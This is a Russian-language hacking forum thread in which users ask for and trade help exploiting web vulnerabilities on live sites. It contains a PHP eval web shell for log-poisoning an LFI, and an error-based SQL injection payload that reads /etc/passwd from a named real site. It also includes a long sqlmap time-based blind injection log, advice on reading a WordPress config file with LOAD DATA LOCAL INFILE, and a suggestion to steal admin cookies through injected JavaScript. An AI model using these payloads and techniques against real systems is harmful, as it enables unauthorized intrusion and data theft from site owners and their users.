Ваши вопросы по уязвимостям.

Типа URL ENCODE explorerне делает

 

типа да, не энкодит

 

А в MOZILLA?

 

А в мозилла энкодит и ничего с этим не поделаешь!

 

Почему это делается в даном случае ? ведь есть работающие GET XSS в Chrome, Mozilla

 

https://security.elarlang.eu/request-uri-query-string-and-url-encoding.html

 

Привет всем читающим.
Нужна помощь. (Сразу извиняюсь, если задаю глупый вопрос)
Нашел lfi, пытаюсь раскрутить.

/proc/self/environ не работает
cmdline - /usr/sbin/httpd
В httpd.conf:
httpd.conf - ErrorLog logs/error_log
Перебирал различные пути, не нашел

Попробовал так:
GET /epicfaaaaaail.php?<?php eval($_GET[cmd])?>
Обращаюсь - /proc/self/fd/8%00&cmd=ls%00
Выдает что-то странное:
PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20
[error] [client x.x.x.x] File does not exist: /local/.../robots.txt
[error] [client x.x.x.x] File does not exist: /local/.../nonlinear
[error] [client x.x.x.x] File does not exist: /local/.../nonlinear
PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20

В каком направлении копать?

 

Пейлод нужно в юзерагенте передавать. Так же, можно попробовать подцепить сессию и посмотреть что туда можно загнать.

https://rdot.org/forum/showthread.php?t=343 много полезной инфы на тему.

Нулл байт не нужен.

 

В соседней статье:
"Ты пишешь мини шелл: <?php eval($_GET[cmd])?>, кодируешь всё в url, составляешь и отправляешь пакет:
POST httр://localhost/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5D%29%3F%3E HTTP/1.1
Host: localhost
А кто? Кто это сделал? Сервер, приняв и обработав запрос, выдает 404 ошибку (о несуществующей страницы epicfaaaaaail.php), и записал это в error_log, выглядеть на сервере это стало так:
Code:
127.0.0.1 - [29/Sep/2010:13:55:36 -0700] "GET /epicfaaaaaail.php?<?php eval($_GET[cmd])?> HTTP/1.1" 404 2326
т.е. получается, обратившись к этому логу, PHP интерпретатор обработает всё до <?phpкак обычный текст, всё что внутри eval($_GET[cmd]) как PHP код, и всё что после?>как обычный текст, а значит всё, шелл есть. Ты обращаешься к error_log: httр://localhost/?page=../../../etc/httpd/log/error_log&cmd=phpinfo();die(); и ничуть не удивившись видишь результат выполнения phpinfo()."

Для сессии нужна рега, если я не ошибаюсь, которой здесь нет.

 

Статью нужно перечитать ещё раз и подробно изучить тему по ссылке, которую я дал выше. У вас получилась мешанина из методов эксплуатации (procfs != логи).

Не обязательно.

 

Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php

На другой БД, в каталоге /blog/ крутиться worpdress.
Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
Могу дать доступ, и если поможете - отблагодарю чисто символически.

Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?

 

Посмотри в сторону load data local infile

 

Тебе уже ответили https://dev.mysql.com/doc/refman/5.7/en/load-data.html но тут нужно знать полный путь к файлу, поэтому нужна еще ошибка раскрытия путей, с галереей может не получится, нужно смотреть каким образом она отображает картинку, скорее всего там будет проверка на то является ли файл корректным изображением. Если ты можешь встраивать JS в страницу, то можно попробовать угнать куки администратора сайта, правда я не знаю как там в Wordpess с этим дела обстоят сейчас.

 

Была уязвимость error based, так крутил: seo-fast.ru/news'or(extractvalue(null,concat(0x3a,substr(load_file(0x2f6574632f706173737764),-30,30))))=
Сейчас вывод ошибок отключен, но думаю там сейчас time based blind, помогите проверить.

 

как таблицы открыть
[19:41:45] [INFO] fetching current database
[19:41:45] [INFO] fetching tables for database: 'имя базы'
[19:41:45] [INFO] fetching number of tables for database 'имя базы'
[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>66
[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>52
[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>48
[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>1
[19:41:47] [INFO] retrieved:
[19:41:47] [DEBUG] performed 4 queries in 1.62 seconds
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>66),SLEEP(10),9830)
[19:41:47] [WARNING] (case) time-based comparison requires larger statistical mo
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>170454),SLEEP(10),9830)
.
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>819325),SLEEP(10),9830)
.
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>261031),SLEEP(10),9830)
.
[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>164592),SLEEP(10),9830)
.
[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>160487),SLEEP(10),9830)
.
[19:41:49] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>871054),SLEEP(10),9830)
.
[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>913561),SLEEP(10),9830)
.
[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>478526),SLEEP(10),9830)
.
[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>192387),SLEEP(10),9830)
.
[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>330357),SLEEP(10),9830)
.
[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>385436),SLEEP(10),9830)
.
[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>145149),SLEEP(10),9830)
.
[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>823404),SLEEP(10),9830)
.
[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>142557),SLEEP(10),9830)
.
[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>848401),SLEEP(10),9830)
.
[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>487756),SLEEP(10),9830)
.
[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>840171),SLEEP(10),9830)
.
[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>800333),SLEEP(10),9830)
.
[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>899978),SLEEP(10),9830)
.
[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>502795),SLEEP(10),9830)
.
[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>128986),SLEEP(10),9830)
.
[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>227072),SLEEP(10),9830)
.
[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>648363),SLEEP(10),9830)
.
[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>656500),SLEEP(10),9830)
.
[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>280401),SLEEP(10),9830)
.
[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>721896),SLEEP(10),9830)
.
[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>769715),SLEEP(10),9830)
.
[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>689458),SLEEP(10),9830)
.
[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>747115),SLEEP(10),9830)
.
[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>103578),SLEEP(10),9830)
. (done)
[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>52),SLEEP(10),9830)
[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>48),SLEEP(10),9830)
[19:42:02] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>1),SLEEP(10),9830)
[19:42:02] [INFO] retrieved:
[19:42:02] [DEBUG] performed 4 queries in 15.59 seconds
[19:42:02] [WARNING] unable to retrieve the number of tables for database 'excel
token'
[19:42:02] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
[19:42:09] [CRITICAL] unable to retrieve the tables in database 'exceltoken'

[*] shutting down at 19:42:09

 

Как в акунетикс настроить скан без тестирование повторяющихся страниц index.php?id=1, index.php?id=2, index.php?id=3

 

Добрый вечер, вопрос уже задавал не могу найти где мне ответили, вообщем, какой запрос чтоб вывести перечень соседних БД при sql inject?

 

Всем привет!
Недавно обнаружил, что есть доступ к моим БД извне: nauchniestati.ru/phpmyadmin/
Насколько это опасно? Как это исправить?
Там ещё какие-то ошибки в файлах
./../php/php-gettext/streams.php
./../php/php-gettext/gettext.php

Кто-нибудь может помочь?

 

Интересует возможность SQL Injection при такои фильтрацыии

Code:

function mssql_custom_escape($str, $trim = true, $encode = true) {
    if(get_magic_quotes_gpc()) {
        $str = stripslashes($str);
    }
    if ($trim) $str = trim($str);
    if ($encode) $str = htmlspecialchars($str);

    return preg_replace("#'#", "''", $str);
}

 

Если запрос что то типо:

то как вариант вывод при уязвимом параметре не обремененном кавычками

т.е получается как SQLI можно разкрутить, второй пример как вариант обремененными кавычками:

т.е можно разкрутить как ErrorBased